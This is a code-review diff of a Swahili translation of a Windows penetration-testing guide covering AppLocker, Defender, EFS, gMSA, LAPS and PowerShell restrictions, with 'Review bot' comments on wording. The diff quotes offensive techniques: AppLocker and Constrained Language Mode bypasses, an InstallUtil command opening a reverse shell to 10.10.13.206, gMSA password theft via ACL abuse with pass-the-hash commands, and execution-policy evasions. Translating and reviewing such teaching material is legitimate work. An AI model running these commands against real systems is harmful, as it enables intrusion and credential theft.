[AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker) ni **ufumbuzi wa orodha ya programu za Microsoft** na inawapa wasimamizi wa mifumo udhibiti juu ya **ni programu na faili zipi watumiaji wanaweza kuendesha**. Inatoa **udhibiti wa kina** juu ya executable, scripts, faili za installer za Windows, DLLs, programu zilizopakiwa, na waandishi wa programu zilizopakiwa.\
Ni kawaida kwa mashirika **kuzuia cmd.exe na PowerShell.exe** na kuandika ufikiaji kwenye directories fulani, **lakini hii yote inaweza kupuuziliwa mbali**.
[AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker) ni suluhisho la Microsoft la **orodha nyeupe ya programu** na huwapa wasimamizi wa mfumo udhibiti juu ya **programu na faili ambazo watumiaji wanaweza kuendesha**. Inatoa **udhibiti wa kina** juu ya executables, scripts, Windows installer files, DLLs, packaged apps, na packed app installers.\
Ni kawaida kwa mashirika **kuzuia cmd.exe na PowerShell.exe** na upatikanaji wa kuandika kwa saraka fulani, **lakini yote haya yanaweza kuepukika**.
### Check
### Angalia
Angalia faili/nyongeza zipi zimeorodheshwa kwenye orodha ya mblacklist/mwhite list:
Angalia ni faili/viendelezi gani vimeorodheshwa kwenye orodha nyeusi au orodha nyeupe:
```bash
Get-ApplockerPolicy -Effective -xml
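Review bot: `orodha ya programu za programu zilizokubaliwa` doubles the word `programu`; `orodha ya programu zilizokubaliwa` is enough. Otherwise the AppLocker paragraph and the `### Angalia` heading are fine.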
@ -20,60 +20,60 @@ Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
$a = Get-ApplockerPolicy -effective
$a.rulecollections
```
Hii njia ya rejista inaelezea mipangilio na sera zinazotumika na AppLocker, ikitoa njia ya kupitia seti ya sasa ya sheria zinazotekelezwa kwenye mfumo:
Njia hii ya rejista ina usanidi na sera zinazotumika na AppLocker, ikitoa njia ya kupitia seti ya sasa ya sheria zinazotekelezwa kwenye mfumo:
- `HKLM\Software\Policies\Microsoft\Windows\SrpV2`
### Bypass
- **Folda zinazoweza kuandikwa** zinazofaa kupita Sera ya AppLocker: Ikiwa AppLocker inaruhusu kutekeleza chochote ndani ya `C:\Windows\System32` au `C:\Windows` kuna **folda zinazoweza kuandikwa** ambazo unaweza kutumia **kupita hii**.
- Zinazofaa **Writable folders** za ku-bypass AppLocker Policy: Ikiwa AppLocker inaruhusu kutekeleza chochote ndani ya `C:\Windows\System32` au `C:\Windows`, kuna **writable folders** ambazo unaweza kutumia ili **bypass this**.
```
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing
```
- Binaries za kawaida **zilizoaminika** [**"LOLBAS's"**](https://lolbas-project.github.io/) zinaweza pia kuwa na manufaa kupita AppLocker.
- **Kanuni zilizoandikwa vibaya zinaweza pia kupitishwa**
- Kwa mfano, **`<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`**, unaweza kuunda **folda inayoitwa `allowed`** mahali popote na itaruhusiwa.
- Mashirika mara nyingi pia yanazingatia **kuzuia `%System32%\WindowsPowerShell\v1.0\powershell.exe` executable**, lakini yanasahau kuhusu **mengine** [**mikoa ya executable ya PowerShell**](https://www.powershelladmin.com/wiki/PowerShell_Executables_File_System_Locations) kama vile `%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` au `PowerShell_ISE.exe`.
- **DLL enforcement mara chache huwekwa** kutokana na mzigo wa ziada ambao inaweza kuweka kwenye mfumo, na kiasi cha majaribio kinachohitajika kuhakikisha hakuna kitu kitaharibika. Hivyo kutumia **DLLs kama backdoors kutasaidia kupita AppLocker**.
- Unaweza kutumia [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) au [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) ili **kutekeleza Powershell** code katika mchakato wowote na kupita AppLocker. Kwa maelezo zaidi angalia: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).
- Kwa kawaida mafaili ya **zinazoaminika** [**"LOLBAS's"**](https://lolbas-project.github.io/) binaries pia yanaweza kusaidia kupitisha AppLocker.
- **Sheria zilizotengenezwa vibaya pia zinaweza kupitishwa**
- Kwa mfano, **`<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`**, unaweza kuunda **folda iitwayo `allowed`** mahali popote na itaruhusiwa.
- Mashirika pia mara nyingi hujikita katika **kuzuia `%System32%\WindowsPowerShell\v1.0\powershell.exe` executable**, lakini husahau kuhusu **mengine** [**PowerShell executable locations**](https://www.powershelladmin.com/wiki/PowerShell_Executables_File_System_Locations) kama `%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` au `PowerShell_ISE.exe`.
- **DLL enforcement mara chache huwa imewezeshwa** kutokana na mzigo wa ziada inaweza kuweka kwenye mfumo, na wingi wa upimaji unaohitajika kuhakikisha hakuna kitu kitakachovunjika. Kwa hivyo kutumia **DLLs as backdoors** kutasaidia kupitisha AppLocker.
- Unaweza kutumia [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) au [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) kutekeleza **Powershell** code katika mchakato wowote na kupitisha AppLocker. Kwa taarifa zaidi angalia: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-constrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-constrained-language-mode).
## Hifadhi ya Akida
## Credentials Storage
### Meneja wa Akaunti za Usalama (SAM)
### Security Accounts Manager (SAM)
Akida za ndani zipo katika faili hii, nywila zimepangwa.
Taarifa za kuingia za eneo zipo katika faili hii; nywila zimehashiwa.
### Mamlaka ya Usalama wa Mitaa (LSA) - LSASS
### Local Security Authority (LSA) - LSASS
**Akida** (zilizopangwa) zime **hifadhiwa** katika **kumbukumbu** ya mfumo huu kwa sababu za Usajili wa Moja.\
**LSA** inasimamia **sera ya usalama** ya ndani (sera ya nywila, ruhusa za watumiaji...), **uthibitishaji**, **tokens za ufikiaji**...\
LSA itakuwa ndiyo itakayofanya **ukaguzi** wa akida zilizotolewa ndani ya faili ya **SAM** (kwa kuingia kwa ndani) na **kuzungumza** na **kikundi cha kudhibiti** ili kuthibitisha mtumiaji wa kikoa.
Taarifa za kuingia (zilizo hashed) zimeshifadhiwa katika kumbukumbu ya subsistemu hii kwa sababu za Single Sign-On.\
**LSA** inaendesha sera za **usalama wa eneo** (sera za nywila, ruhusa za watumiaji...), **authentication**, **access tokens**...\
LSA ndicho kitakachokagua cheti zilizotolewa ndani ya faili ya **SAM** (kwa kuingia kwa eneo) na kuzungumza na **domain controller** kuthibitisha mtumiaji wa domain.
**Akida** zime **hifadhiwa** ndani ya **mchakato wa LSASS**: tiketi za Kerberos, hashes NT na LM, nywila zinazoweza kufichuliwa kwa urahisi.
Taarifa za kuingia zimeshifadhiwa ndani ya mchakato **LSASS**: tiketi za Kerberos, hashes NT na LM, nywila zinazoweza kufunguliwa kwa urahisi.
### Siri za LSA
### LSA secrets
LSA inaweza kuhifadhi kwenye diski baadhi ya akida:
LSA inaweza kuhifadhi kwenye diski baadhi ya taarifa za kuingia:
- Nywila ya akaunti ya kompyuta ya Active Directory (kikundi cha kudhibiti kisichoweza kufikiwa).
- Nywila ya akaunti ya kompyuta ya Active Directory (domain controller isiyoweza kufikiwa).
- Nywila za akaunti za huduma za Windows
- Nywila za kazi zilizopangwa
- Zaidi (nywila za programu za IIS...)
### NTDS.dit
Ni hifadhidata ya Active Directory. Ipo tu katika Vikundi vya Kudhibiti.
Ni hifadhidata ya Active Directory. Ipo tu kwenye Domain Controllers.
## Defender
[**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft_Defender) ni Antivirus inayopatikana katika Windows 10 na Windows 11, na katika matoleo ya Windows Server. In **zuia** zana za kawaida za pentesting kama **`WinPEAS`**. Hata hivyo, kuna njia za **kupita ulinzi huu**.
[**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft_Defender) ni Antivirus inayopatikana katika Windows 10 na Windows 11, na katika toleo za Windows Server. Inazuia zana za kawaida za pentesting kama **`WinPEAS`**. Hata hivyo, kuna njia za **kupitisha ulinzi huu**.
### Angalia
### Check
Ili kuangalia **hali** ya **Defender** unaweza kutekeleza cmdlet ya PS **`Get-MpComputerStatus`** (angalia thamani ya **`RealTimeProtectionEnabled`** kujua kama inafanya kazi):
Ili kukagua **hali** ya **Defender** unaweza kutekeleza PS cmdlet **`Get-MpComputerStatus`** (angalia thamani ya **`RealTimeProtectionEnabled`** kujua kama imewezeshwa):
<pre class="language-powershell"><code class="lang-powershell">PS C:\> Get-MpComputerStatus
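Review bot: The heading language flips direction inside this hunk: L404 and L406 replace Swahili headings with English ("Hifadhi ya Akida" → "Credentials Storage", "Meneja wa Akaunti za Usalama (SAM)" → "Security Accounts Manager (SAM)") and L435 turns "Angalia" into "Check", while the body text under them stays Swahili; later in the same commit headings go the other way. Pick one convention (English technical heading over Swahili body, or fully Swahili) and apply it to every heading in the file. Two small typos in the new lines: "zimeshifadhiwa" at L414 and L418 should be "zimehifadhiwa", and "katika toleo za Windows Server" at L433 needs the agreeing plural "katika matoleo ya Windows Server".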
@ -92,7 +92,7 @@ NISEngineVersion : 0.0.0.0
PSComputerName :
</code></pre>
Ili kuorodhesha unaweza pia kukimbia:
Kwa ajili ya kuorodhesha pia unaweza kuendesha:
```bash
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
wmic /namespace:\\root\securitycenter2 path antivirusproduct
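Review bot: Style point on L443: "Kwa ajili ya kuorodhesha pia unaweza kuendesha:" reads awkwardly; "Ili kuorodhesha, unaweza pia kuendesha:" keeps the useful change (replacing "kukimbia", which is physical running, with "kuendesha" for running a command) without the clumsy opener.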
@ -103,36 +103,37 @@ sc query windefend
```
## Encrypted File System (EFS)
EFS inalinda faili kupitia usimbaji, ikitumia **symmetric key** inayojulikana kama **File Encryption Key (FEK)**. Funguo hii inasimbwa kwa kutumia **public key** ya mtumiaji na kuhifadhiwa ndani ya $EFS **alternative data stream** ya faili iliyosimbwa. Wakati usimbuaji unahitajika, **private key** inayolingana ya cheti cha kidijitali cha mtumiaji inatumika kusimbua FEK kutoka kwenye $EFS stream. Maelezo zaidi yanaweza kupatikana [hapa](https://en.wikipedia.org/wiki/Encrypting_File_System).
EFS inalinda faili kwa usimbaji, ikitumia **ufunguo wa simetriki** unaojulikana kama **File Encryption Key (FEK)**. Ufunguo huu unasimbwa kwa kutumia **public key** ya mtumiaji na kuhifadhiwa ndani ya $EFS **alternative data stream** ya faili iliyosimbwa. Wakati ufunguzi unahitajika, **private key** inayolingana ya cheti dijitali la mtumiaji inatumika kusimua FEK kutoka kwenye mfululizo wa $EFS. Maelezo zaidi yanaweza kupatikana [here](https://en.wikipedia.org/wiki/Encrypting_File_System).
**Mifano ya Usimbuaji bila kuanzishwa na mtumiaji** ni pamoja na:
**Madaraja ya kuyafungua bila kuanzishwa na mtumiaji** ni pamoja na:
- Wakati faili au folda zinahamishwa kwenye mfumo wa faili usio EFS, kama [FAT32](https://en.wikipedia.org/wiki/File_Allocation_Table), zinapaswa kusimbuliwa moja kwa moja.
- Faili zilizofichwa zinazotumwa kupitia mtandao kupitia SMB/CIFS protocol zinapaswa kusimbuliwa kabla ya usafirishaji.
- Wakati faili au folda zinapotamishwa kwenda kwenye mfumo wa faili usio wa EFS, kama [FAT32](https://en.wikipedia.org/wiki/File_Allocation_Table), zinafutwa usimbaji kwa 자동.
- Faili zilizofichwa zinazotumwa kupitia mtandao kwa protokoli ya SMB/CIFS zinasimuliwa kabla ya kutumwa.
Njia hii ya usimbaji inaruhusu **upatikanaji wa wazi** kwa faili zilizofichwa kwa mmiliki. Hata hivyo, kubadilisha tu nenosiri la mmiliki na kuingia hakutaruhusu usimbuaji.
Njia hii ya usimbaji inaruhusu **ufikiaji wazi** wa faili zilizofichwa kwa mmiliki. Hata hivyo, kubadilisha nenosiri la mmiliki na kuingia tu hakutaruhusu kusimuliwa.
**Mambo Muhimu**:
**Mambo muhimu kukumbuka**:
- EFS inatumia FEK ya symmetric, iliyosimbwa kwa kutumia public key ya mtumiaji.
- Usimbuaji unatumia private key ya mtumiaji kupata FEK.
- Usimbuaji wa moja kwa moja unafanyika chini ya hali maalum, kama vile kunakili kwenye FAT32 au usafirishaji wa mtandao.
- EFS inatumia FEK wa simetriki, iliyosimbwa kwa public key ya mtumiaji.
- Kusimua kunatumia private key ya mtumiaji kupata FEK.
- Kusimuliwa kwa automatiki hutokea katika hali maalum, kama kunakopywa kwenye FAT32 au wakati wa usafirishaji wa mtandao.
- Faili zilizofichwa zinapatikana kwa mmiliki bila hatua za ziada.
### Angalia taarifa za EFS
### Check EFS info
Angalia kama **mtumiaji** amekuwa **akitumia** huduma hii kwa kuangalia kama njia hii inapatikana:`C:\users\<username>\appdata\roaming\Microsoft\Protect`
Angalia kama **mtumiaji** ame **tumia** **huduma** hii kwa kukagua kama njia hii ipo:`C:\users\<username>\appdata\roaming\Microsoft\Protect`
Angalia **nani** ana **upatikanaji** wa faili kwa kutumia cipher /c \<file>\
Unaweza pia kutumia `cipher /e` na `cipher /d` ndani ya folda ili **kusimbua** na **kusimbua** faili zote
Check **who** has **access** to the file using cipher /c \<file>\
Unaweza pia kutumia `cipher /e` na `cipher /d` ndani ya folda ili **encrypt** na **decrypt** faili zote
### Kusimbua faili za EFS
### Decrypting EFS files
#### Kuwa Mamlaka ya Mfumo
#### Being Authority System
Njia hii inahitaji **mtumiaji wa kidhulumu** kuwa **akifanya** **mchakato** ndani ya mwenyeji. Ikiwa hiyo ni kesi, kwa kutumia `meterpreter` sessions unaweza kuiga token ya mchakato wa mtumiaji (`impersonate_token` kutoka `incognito`). Au unaweza tu `migrate` kwenye mchakato wa mtumiaji.
Njia hii inahitaji **mtumiaji wa mwathiriwa** kuwa **anazungusha** **mchakato** ndani ya host. Ikiwa hivyo ndio hali, kwa kutumia session za `meterpreter` unaweza kujifanya token ya mchakato wa mtumiaji (`impersonate_token` kutoka `incognito`). Au unaweza tu `migrate` kwenda mchakato wa mtumiaji.
#### Knowing the users password
#### Kujua nenosiri la watumiaji
{{#ref}}
https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files
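Review bot: L456 ships a non-Swahili token in the middle of a sentence: "zinafutwa usimbaji kwa 자동." (Korean for "automatic"); it should read "zinasimbuliwa kiotomatiki", and "zinapotamishwa" on the same line is a typo for "zinapohamishwa". The new wording also swaps the correct Swahili verb for decrypt, "kusimbua"/"usimbuaji" (old L450, L458, L463), for "kusimua"/"zinasimuliwa"/"Kusimuliwa" at L451, L457, L459, L466 and L467, which is not a word; revert to "kusimbua". Direction is again inconsistent: L475 replaces a Swahili sentence with English ("Check **who** has **access** to the file using cipher /c \<file>\") while L484 translates an English heading into Swahili. Minor wording at L482: "anazungusha mchakato" and "kujifanya token" are odd choices; "anaendesha mchakato" and "kuiga token ya mchakato" carry the intended meaning (running a process, impersonating its token).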
@ -140,29 +141,65 @@ https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files
## Group Managed Service Accounts (gMSA)
Microsoft ilitengeneza **Group Managed Service Accounts (gMSA)** ili kurahisisha usimamizi wa akaunti za huduma katika miundombinu ya IT. Tofauti na akaunti za huduma za jadi ambazo mara nyingi zina mipangilio ya "**Password never expire**" iliyoanzishwa, gMSAs hutoa suluhisho salama na linaloweza kusimamiwa zaidi:
Microsoft ilitengeneza **Group Managed Service Accounts (gMSA)** kurahisisha usimamizi wa akaunti za service katika miundombinu ya IT. Tofauti na akaunti za service za jadi ambazo mara nyingi zinawekwa na sifa ya "**Password never expire**", gMSA zinatoa suluhisho salama na rahisi kusimamia:
- **Usimamizi wa Nenosiri wa Moja kwa Moja**: gMSAs hutumia nenosiri tata la herufi 240 ambalo hubadilika moja kwa moja kulingana na sera ya kikoa au kompyuta. Mchakato huu unashughulikiwa na Huduma ya Usambazaji wa Funguo ya Microsoft (KDC), ikiondoa haja ya masasisho ya nenosiri ya mikono.
- **Usalama Ulioimarishwa**: Akaunti hizi hazihusiki na kufungwa na haziwezi kutumika kwa kuingia kwa mwingiliano, kuimarisha usalama wao.
- **Msaada wa Wenyeji Wengi**: gMSAs zinaweza kushirikiwa kati ya wenyeji wengi, na kuifanya kuwa bora kwa huduma zinazofanya kazi kwenye seva nyingi.
- **Uwezo wa Kazi Iliyopangwa**: Tofauti na akaunti za huduma zinazodhibitiwa, gMSAs zinasaidia kuendesha kazi zilizopangwa.
- **Usimamizi wa SPN ulio Rahisishwa**: Mfumo unasasisha moja kwa moja Jina la Kiongozi wa Huduma (SPN) wakati kuna mabadiliko katika maelezo ya sAMaccount ya kompyuta au jina la DNS, kuimarisha usimamizi wa SPN.
- **Automatic Password Management**: gMSA zinatumia nenosiri tata la herufi 240 ambalo hubadilika kiotomatiki kulingana na sera za domain au kompyuta. Mchakato huu unafanywa na Key Distribution Service (KDC) ya Microsoft, kuondoa hitaji la masasisho ya nenosiri kwa mikono.
- **Enhanced Security**: Akaunti hizi hazifikiriwi kwa lockouts na hazitumiwi kwa interactive logins, hivyo kuongeza usalama.
- **Multiple Host Support**: gMSA zinaweza kushirikiwa kati ya host nyingi, zikifanya kuwa bora kwa services zinazoendesha kwenye server nyingi.
- **Scheduled Task Capability**: Tofauti na managed service accounts, gMSA zinaunga mkono kuendesha scheduled tasks.
- **Simplified SPN Management**: Mfumo hubadilisha Service Principal Name (SPN) kiotomatiki wakati kuna mabadiliko kwa sAMaccount details za kompyuta au jina la DNS, kurahisisha usimamizi wa SPN.
Nenosiri za gMSAs zinahifadhiwa katika mali ya LDAP _**msDS-ManagedPassword**_ na zinarejeshwa moja kwa moja kila siku 30 na Wasimamizi wa Kikoa (DCs). Nenosiri hili, ambalo ni blob ya data iliyosimbwa inayojulikana kama [MSDS-MANAGEDPASSWORD_BLOB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e), linaweza kupatikana tu na wasimamizi walioidhinishwa na seva ambazo gMSAs zimewekwa, kuhakikisha mazingira salama. Ili kufikia taarifa hii, unahitaji muunganisho salama kama LDAPS, au muunganisho lazima uthibitishwe na 'Sealing & Secure'.
Nenosiri za gMSA zimetunzwa kwenye mali ya LDAP _**msDS-ManagedPassword**_ na hubadilishwa kiotomatiki kila siku 30 na Domain Controllers (DCs). Nenosiri hili, blob ya data iliyosimbwa inayojulikana kama [MSDS-MANAGEDPASSWORD_BLOB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e), inaweza kuonekana tu na wasimamizi walioidhinishwa na server zinazoweka gMSA, kuhakikisha mazingira salama. Ili kupata taarifa hii, inahitaji muunganisho uliolindwa kama LDAPS, au muunganisho lazima uwe authenticated na 'Sealing & Secure'.
![https://cube0x0.github.io/Relaying-for-gMSA/](../../images/asd1.png)
Unaweza kusoma nenosiri hili kwa [**GMSAPasswordReader**](https://github.com/rvazarkar/GMSAPasswordReader)**:**
Unaweza kusoma nenosiri hili kwa kutumia [**GMSAPasswordReader**](https://github.com/rvazarkar/GMSAPasswordReader)**:**
```
/GMSAPasswordReader --AccountName jkohler
```
[**Pata maelezo zaidi katika chapisho hili**](https://cube0x0.github.io/Relaying-for-gMSA/)
[**Find more info in this post**](https://cube0x0.github.io/Relaying-for-gMSA/)
Pia, angalia [web page](https://cube0x0.github.io/Relaying-for-gMSA/) kuhusu jinsi ya kutekeleza **NTLM relay attack** ili **read** **password** ya **gMSA**.
### Kutumia vibaya mnyororo wa ACL kusoma password iliyosimamiwa ya gMSA (GenericAll -> ReadGMSAPassword)
Katika mazingira mengi, watumiaji wenye vigezo vya chini wanaweza kupitisha kwa siri za gMSA bila kuathiri DC kwa kutumia vibaya ACL za vitu zilizopangwa vibaya:
- Kundi unachosimamia (mfano, via GenericAll/GenericWrite) umepewa `ReadGMSAPassword` juu ya gMSA.
- Kwa kujiunga na kundi hilo, unapata haki ya read blob ya `msDS-ManagedPassword` ya gMSA kupitia LDAP na kupata NTLM credentials zinazotumika.
Mtiririko wa kawaida wa kazi:
1) Gundua njia kwa kutumia BloodHound na taja principals zako za foothold kama Owned. Angalia edges kama:
- GroupA GenericAll -> GroupB; GroupB ReadGMSAPassword -> gMSA
2) Jumuisha wewe mwenyewe katika kundi la kati unaolisimamia (mfano kwa bloodyAD):
```bash
bloodyAD --host <DC.FQDN> -d <domain> -u <user> -p <pass> add groupMember <GroupWithReadGmsa> <user>
```
3) Soma neno la siri la gMSA linalosimamiwa kupitia LDAP na tengeneza hash ya NTLM. NetExec inafanya otomatiki uondoaji wa `msDS-ManagedPassword` na uongofu hadi NTLM:
```bash
# Shows PrincipalsAllowedToReadPassword and computes NTLM automatically
netexec ldap <DC.FQDN> -u <user> -p <pass> --gmsa
# Account: mgtsvc$ NTLM: edac7f05cded0b410232b7466ec47d6f
```
4) Thibitisha kama gMSA ukitumia NTLM hash (plaintext haidingiki). Ikiwa akaunti iko katika Remote Management Users, WinRM itafanya kazi moja kwa moja:
```bash
# SMB / WinRM as the gMSA using the NT hash
netexec smb <DC.FQDN> -u 'mgtsvc$' -H <NTLM>
netexec winrm <DC.FQDN> -u 'mgtsvc$' -H <NTLM>
```
Vidokezo:
- Usomaji wa LDAP wa `msDS-ManagedPassword` unahitaji sealing (mfano: LDAPS/sign+seal). Zana zinashughulikia hili moja kwa moja.
- gMSAs mara nyingi hupewa haki za ndani kama WinRM; thibitisha uanachama wa kikundi (mfano: Remote Management Users) ili kupanga lateral movement.
- Ikiwa unahitaji blob tu ili kuhesabu NTLM wewe mwenyewe, ona muundo wa MSDS-MANAGEDPASSWORD_BLOB.
Pia, angalia hii [ukurasa wa wavuti](https://cube0x0.github.io/Relaying-for-gMSA/) kuhusu jinsi ya kufanya **NTLM relay attack** ili **kusoma** **nenosiri** la **gMSA**.
## LAPS
**Local Administrator Password Solution (LAPS)**, inayopatikana kwa kupakuliwa kutoka [Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=46899), inaruhusu usimamizi wa nenosiri za Msimamizi wa ndani. Nenosiri haya, ambayo ni **ya nasibu**, ya kipekee, na **yanabadilishwa mara kwa mara**, yanahifadhiwa kwa kati katika Active Directory. Upatikanaji wa nenosiri haya umewekwa vizuizi kupitia ACLs kwa watumiaji walioidhinishwa. Kwa ruhusa ya kutosha, uwezo wa kusoma nenosiri za msimamizi wa ndani unapatikana.
The **Local Administrator Password Solution (LAPS)**, available for download from [Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=46899), inaruhusu usimamizi wa nywila za Administrator wa mkoa. Nywila hizi, ambazo ni **zilizoanzishwa kwa nasibu**, za kipekee, na **zinabadilishwa mara kwa mara**, zinahifadhiwa kati katika Active Directory. Upatikanaji wa nywila hizi umefungwa kupitia ACLs kwa watumiaji walioteuliwa. Ikiwa ruhusa za kutosha zimepewa, uwezo wa kusoma nywila za admin wa mkoa unapatikana.
{{#ref}}
../active-directory-methodology/laps.md
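Review bot: L497 changes the meaning of the security property: "hazifikiriwi kwa lockouts na hazitumiwi kwa interactive logins" says the accounts are "not considered for lockouts and are not used for interactive logins", whereas the old L492 correctly stated they are immune to lockout and cannot be used for interactive logon ("hazihusiki na kufungwa na haziwezi kutumika kwa kuingia kwa mwingiliano"); suggest "haziathiriwi na lockouts na haziwezi kutumika kwa interactive logins". L529 is garbled: "plaintext haidingiki" should be "plaintext haihitajiki" (plaintext not required). L542 renders local administrator as "Administrator wa mkoa"/"admin wa mkoa" ("mkoa" is a region or province); keep "wa ndani" as in the old L541, and the line still opens with untranslated English ("The **Local Administrator Password Solution (LAPS)**, available for download from"). L513 "watumiaji wenye vigezo vya chini wanaweza kupitisha kwa siri za gMSA" should be "watumiaji wenye ruhusa za chini wanaweza kufikia siri za gMSA". For the new ACL-chain section, the "Vidokezo" list at L535-L538 would benefit from the defensive counterpart that the hunk itself already implies: the set of principals allowed to read the password, which the `--gmsa` output at L525 enumerates ("Shows PrincipalsAllowedToReadPassword"), together with who can change membership of those groups (L514), is what decides the exposure and is what an administrator should audit. Also mark the hash in the L527 comment ("# Account: mgtsvc$ NTLM: ...") as sample lab output so it is not mistaken for a value to reuse. Finally, L496-L500 keep the bullet lead terms in English and L510 reverts a Swahili link text to "Find more info in this post", which conflicts with the translated L505 and L539 around them.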
@ -170,20 +207,20 @@ Pia, angalia hii [ukurasa wa wavuti](https://cube0x0.github.io/Relaying-for-gMSA
## PS Constrained Language Mode
PowerShell [**Constrained Language Mode**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) **inafungia mbali vipengele vingi** vinavyohitajika kutumia PowerShell kwa ufanisi, kama vile kuzuia vitu vya COM, kuruhusu tu aina za .NET zilizothibitishwa, michakato ya XAML, madarasa ya PowerShell, na zaidi.
PowerShell [**Constrained Language Mode**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) **inazuia vipengele vingi** vinavyohitajika ili kutumia PowerShell kwa ufanisi, kama kuzuia COM objects, kuruhusu tu aina za .NET zilizokubaliwa, XAML-based workflows, PowerShell classes, na zaidi.
### **Angalia**
### **Kagua**
```bash
$ExecutionContext.SessionState.LanguageMode
#Values could be: FullLanguage or ConstrainedLanguage
```
### Kupita
### Kuvuka
```bash
#Easy bypass
Powershell -version 2
```
Katika Windows ya sasa, Bypass hiyo haitafanya kazi lakini unaweza kutumia [**PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM).\
**Ili kuikamilisha unahitaji** **ku** _**ongeza Rejeleo**_ -> _Browse_ -> _Browse_ -> ongeza `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` na **badilisha mradi kuwa .Net4.5**.
Kwenye Windows za sasa bypass hiyo haitafanya kazi lakini unaweza kutumia [ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM).\
**Ili kuikompaila unaweza kuhitaji** **kufanya** _**Add a Reference**_ -> _Browse_ -> _Browse_ -> ongeza `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` na **badilisha project kuwa .Net4.5**.
#### Bypass ya moja kwa moja:
```bash
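Review bot: Terminology for "bypass" is inconsistent across the commit: "kupitisha" (L433), "Kuvuka" (L556), "kuepuka" (L572, L576) and the untranslated "Bypass" (L565). "Kuvuka" means to cross over (a road or river) and does not fit a heading about evading Constrained Language Mode; settle on one term, "kuepuka" or "kupitisha", and use it in every heading and sentence. Formatting nit at L563: the stray space in "[ **PSByPassCLM**]" becomes part of the rendered link text; drop it.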
@ -193,11 +230,11 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogTo
```bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe
```
Unaweza kutumia [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) au [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) ili **kutekeleza Powershell** msimbo katika mchakato wowote na kupita njia iliyozuiliwa. Kwa maelezo zaidi angalia: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).
Unaweza kutumia [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) au [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) ili **kutekeleza Powershell** code katika mchakato wowote na kuepuka constrained mode. Kwa taarifa zaidi angalia: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-constrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-constrained-language-mode).
## Sera ya Utekelezaji wa PS
## Sera ya Utekelezaji ya PS
Kwa default imewekwa kuwa **imezuiliwa.** Njia kuu za kupita sera hii:
Kwa chaguo-msingi imewekwa kuwa **restricted.** Njia kuu za kuepuka sera hii:
```bash
1º Just copy and paste inside the interactive PS console
2º Read en Exec
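Review bot: L572 silently corrects the link path ("...powershell-contstrained-language-mode" → "...powershell-constrained-language-mode"). That is a content fix rather than a translation and is easy to miss inside a translation-only commit; mention it in the commit message or land it separately so the link change gets reviewed on its own. Keeping the policy value "restricted" literal in bold at L576 is the right call, since it is the value `Get-ExecutionPolicy`-style checks return rather than prose.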
@ -217,36 +254,42 @@ Powershell -command "Write-Host 'My voice is my passport, verify me.'"
9º Use EncodeCommand
$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
```
More can be found [here](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)
Zaidi zinaweza kupatikana [here](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)
## Security Support Provider Interface (SSPI)
Ni API inayoweza kutumika kuthibitisha watumiaji.
Ni API inayotumika kuthibitisha watumiaji.
